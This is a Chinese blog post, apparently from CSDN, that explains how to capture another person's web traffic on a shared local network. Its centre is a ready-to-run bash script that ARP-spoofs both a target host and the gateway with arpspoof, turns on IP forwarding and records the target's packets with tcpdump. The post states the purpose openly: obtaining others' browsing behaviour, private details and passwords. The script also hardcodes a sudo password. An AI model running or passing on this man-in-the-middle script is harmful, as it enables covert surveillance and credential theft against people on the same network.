• 作者：邹祁峰
• 邮箱：Qifeng.zou.job@hotmail.com
• 博客：http://blog.csdn.net/qifengzou
• 日期：2015.12.16
• 转载请注明来自"祁峰"的CSDN博客

由于互联网的快速发展，人们的生活、休闲、工作已经越来越离不开网络。在使用网络网络的过程中，必然会产生网络数据。如果能拿到他人上网的数据，便可从中获取他人的网络行为、生活隐私、甚至账户密码。当前移动、联通、电信等运营商会在核心网络设备上抓取用户的上网数据包，并从中分析用户的行为和习惯，再挖掘潜在的商业价值。那么如果要想获知局域网内他人的网络数据时，那应该怎么做呢？

现假如D和H处在同一局域网，G为该局域网的网关。如果此时H想知道D正在浏览什么网页，则H可通过执行以下脚本的方式获取D上网的数据，并从中获知D的当前上网行为：[注：脚本第一个参数为输出文件名]

#!/bin/bash PASSWD="111111"                       # 执行sudo命令的密码
NET_NAME="wlan0"                      # 网卡设备名
TARIP="10.58.93.92"                   # 目标主机IP
GATE_WAY="10.58.94.1"                 # 网管IP地址# 开启IP转发功能
echo $PASSWD | sudo -S sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"# 关闭其他干扰进程
echo $PASSWD | sudo -S pkill arpspoof
echo $PASSWD | sudo -S pkill tcpdump# 参数1为网络包的存储文件名， 不能省略！
if [ $# -ne 1 ]; thenecho "Please input save pcap file name" exit -1
fi# 欺骗目标主机，本机是网关
echo $PASSWD | sudo -S arpspoof -i ${NET_NAME} -t ${TARIP} ${GATE_WAY} &# 欺骗网关，本机是目标主机
echo $PASSWD | sudo -S arpspoof -i ${NET_NAME} -t ${GATE_WAY} ${TARIP} &# 经过以上欺骗动作，从目标主机发出的网络包都会经过本机；而从网关发往目标主机的网络包也会经过主机
# 因此，此时便可通过工具tcpdump抓取指定网卡、指定IP的网络包
echo $PASSWD | sudo -S tcpdump -i wlan0 -p -s0 host ${TARIP} and not arp  -w $1.pcap &

该脚本执行后，其抓包的结果如下：

图1 抓包效果图

获知局域网内他人的上网数据和行为相关推荐

1. 局域网内通过代理服务器上网的详细设置

   局域网内通过代理服务器上网的详细设置    在局域网内没有路由器,或者在局域网内想避开限制,让其他计算机通过某一台计算机上网的话可以采用这种方法. 具体步骤: 1,选择一台计算机作为代理服务器,并在其 ...

2. 使用跳板机实现外网访问局域网内虚拟机的大数据及K8S集群【借助向日葵】

   使用跳板机实现外网访问局域网内虚拟机的大数据及K8S集群[借助向日葵] 前言 笔者作为一杆大数据学徒工,工作和学习中都需要有几套属于自己的集群. 双路e5主机:https://lizhiyong.bl ...

3. 局域网内, A(不可上网)代理到B(可上网)上网

   前言 一般的大公司直接插网线的话, 是不能直接上网的, 都采用软件登录认证才能正常上网 (当然私自接路由器也不能的).当然这个软件也是出于安全考虑, 但有时也会造成工作的不方便. 例如,  博主的机器 ...

4. arp欺骗断网攻击（控制局域网内的网络）

   [前言]  ARP攻击:ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址. ARP协议存在 ...

5. 局域网内ubuntu显示网络已经连接，能ping通，打不开网页

   仅供记录,已解决.(可能没啥参考价值,谨慎) 先贴个链接https://www.linuxdiyf.com/linux/29892.html 问题描述: PC机,win10和ubuntu16.04双系 ...

6. 局域网内大幅提高网速

   局域网内大幅提高网速 这是一款用go语言写的局域网提速软件,能够几倍几十倍的提升本机网速. 使用限制: 1 局域网内(校园网或者公司内网) 2 局域网内使用DHCP上网 3 win10电脑,而且使用的 ...

7. 基于WFP等网络驱动实现局域网内所有设备通过代理上网

   by fanxiushu 2020-10-13 转载或引用请注明原始作者 开始之前,我们先来理解标题是什么意思. 这里所说的局域网内的所有设备通过代理上网,并不是在每台设备上安装某个代理软件然后再通过 ...

8. squid反向代理作为web前端内容缓存器及局域网内客户机通过代理服务器上网

   反向代理服务器有两种传输模式: 1.同步模式:(如:squid)用户发起请求,请求立即被转到后端的服务器,于是在浏览器和后端服务器之间就建立了一个连接,在请求完成前这个连接是一直存在的. 2.异步模式 ...

9. 局域网内PC通过笔记本共享上网

   现实:PC.笔记本都通过网线接在局域网内,局域网无法上网:笔记本有无线网卡,可连WIFI上网. 现在想让PC通过笔记本来共享上网. 步骤: 1.笔记本开启DHCP.方法是开启"服务" ...

最新文章

1. 快速上手MyBatisPlus~（基友搭配，效率翻倍）
2. DARPA 2020财年研发预算 人工智能应用研究投资急剧增长
3. 【转】nginx提示：500 Internal Server Error错误的解决方法
4. AI 事件驱动场景 Serverless 实践
5. Android 国际化
6. flink报错org.apache.commons.cli.Option.builder
7. Android图片上倒计时,Android自定义照相机倒计时拍照
8. .net MVC路由
9. 云原生，智慧营销破圈新利器
10. SQL Server2008优化之SET STATISTICS开关
11. spark提交任务的两种的方法
12. 计网 - TCP 的稳定性：滑动窗口和流速控制是怎么回事？
13. 手绘板计算机技术,手绘板怎么用 手绘板和数位板的差别区别【详解】
14. 我是一名资深程序员，而今天我又多了一个创业者的身份（2）
15. ＜＜视觉问答＞＞2022：SwapMix: Diagnosing and Regularizingthe Over-Reliance on Visual Context in VQA
16. 浅谈人工智能：现状、任务、构架与统一
17. matlab r2020b百度网盘下载链接及安装过程
18. 微信气泡主题设置_微信气泡主题使用教程
19. Python抓取淘女郎网页信息以及代码下载
20. 关于天魔传说试玩感受

热门文章

1. php文件格式转换vcf,VCF转换PLINK格式的3种方法
2. 项目数据分析师CPDA印章
3. 驻极体麦和MEMS麦
4. python设计教务管理系统_python课程设计——基于wx的GUI教务系统——2020.12.25
5. 获取每天最高分数且最新的数据（java实现）
6. Java el ognl 正则,struts2中ognl表达式 各种合集_struts2 ognl 正则表达式_struts2 ognl表达式...
7. Python: 生成带用户昵称的头像
8. FTP 两种连接模式
9. （数据结构）1.实现二叉树的各种基本运算的算法2.实现二叉树的各种遍历算法3. 由遍历序列构造二叉树4.求二叉树中的结点个数、叶子节点个数、某结点层次和二叉树宽度
10. ArcGIS超级工具SPTOOLS-线封闭,点集转面